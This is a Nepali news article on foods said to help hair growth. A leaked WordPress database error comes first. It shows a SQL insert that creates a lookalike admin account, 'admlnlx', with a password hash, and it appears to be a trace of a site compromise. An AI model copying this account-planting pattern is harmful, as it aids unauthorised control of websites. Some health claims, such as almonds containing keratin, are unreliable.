WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BD1MOvSqonkR/VYFGozJj2nWRkALKb/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 05:23:14', '', 'admlnlx', 'admlnlx')
चितवन,पुस १०-
आफ्नो कपाल सुन्दर होस् भन्ने सबैले चाहन्छन्। कपाल उमार्न, बाक्लो बनाउन, सुन्दर बनाउन मानिसले विभिन्न औषधी लगाउँछन्। तर खानपिनमा त्यति ध्यान दिँदैनन्। केही खानेकुराले विषेशगरी कपाललाई फाइदा पुग्छ। कपाललाई फाइदा गर्ने खानेकुरा यस्ता छन्ः
आल्मोन्डः कपाल र तालुलाई हानी गर्ने तत्व सूर्यको किरण पनि हो। सूर्यको किरणले तालु पोल्दा यसले नयाँ कपाल उत्पादनमा हानी गर्छ। तर, नियमित आल्मोन्ड खाँदा कपाललाई घामले पुर्याउने नोक्सानी कम हुन्छ। आलमोन्डले छालालाई जोगाउने मात्र होइन यसमा हुने केराटिन नाम गरेको तत्वले कपाललाई मजबुतसमेत बनाउँछ ।
आलसको गेडाः कपालको राम्रोसँग हेरचाह भएन भने जिङ्ग्रिङ्ग र फुस्रो हुन्छ। कपालमा लट्टा बस्छ र कोर्न गाह्रो हुन्छ, जसले कपाल झर्ने सम्भावना बढी हुन्छ। आलसको तेलमा हुने ओमेगा–३ फ्याटी एसिडले कपाललाई सुन्दर, नरम र मुलायम बनाउँछ।
गेडागुडीः गेडागुडीमा आइरनको मात्रा प्रसस्त हुन्छ। शरीरको रक्त प्रवाहमा आइरन महत्वपूर्ण हुन्छ। आइरनले कपालको जरा बलियो बनाउँछ। नियमित रुपमा गेडागुडी खाँदा कपाल झर्नबाट रोकिनुका साथै कपालको जरा बलियो हुन्छ।
सागपातः कपाललाई मजबुत र सुन्दर बनाउन मेथाइसल्फनिमिथेन (एमएसएम) नामक तत्व आवश्यक पर्छ। तर, कपाल वृद्धिका लागि एमएसएमको महत्वपूर्ण भूमिका हुन्छ। एमएसएमलाई अर्गानिक सल्फर पनि भनिन्छ, जुन केराटिनको विकासका लागि महत्वपूर्ण मानिन्छ।
आइस्टरः कपाल झर्ने साझा कारण जिङ्कको अभाव हो। तसर्थ सातामा थोरै औंश आइस्टर खानुभयो भने जिङ्कको मात्रा प्रसस्त पाउनुहुन्छ, जसले कपाललाई स्वस्थ र सुन्दर बनाउँछ।
एभोकाडोः कपाल वृद्धि र झर्नबाट रोक्न एभोकाडो पनि महत्वपूर्ण मानिन्छ। एभोकाडोबाट प्राप्त हुने ओमेगा–३ फ्याटी एसिडले कपाललाई स्वस्थ र बलियो बनाउँछ। एभोकाडोलाई थिचेर यसलाई स्याम्पुका रुपमा पनि प्रयोग गर्न सकिन्छ।
साल्मोनः साल्मोनमा हुने ओमेगा–३ फ्याटी एसिडले कपाललाई आकर्षक बनाउँछ।
अण्डाः प्रोटिनको अभावमा हाम्रो शरीरका अंग बृद्धि हुँदैनन्। कपालको सन्र्दभमा पनि त्यही लागू हुन्छ। अण्डामा प्रोटिन मात्र होइन यसमा बायोटिन पनि हुन्छ, जसले कपाललाई लामो र बलियो बनाउँछ।
पानीः पानीले शरीरलाई मात्र होइन कपाललाई पनि स्वस्थ बनाउँछ। डिहाइड्रेसनले कपाललाई हानी पुर्याउँछ। प्रसस्त पानी पिउनाले कपाल सुन्दर र चम्किलो बन्छ। तसर्थ दैनिक ८ देखि १० गिलास पानी पिउनुपर्छ ।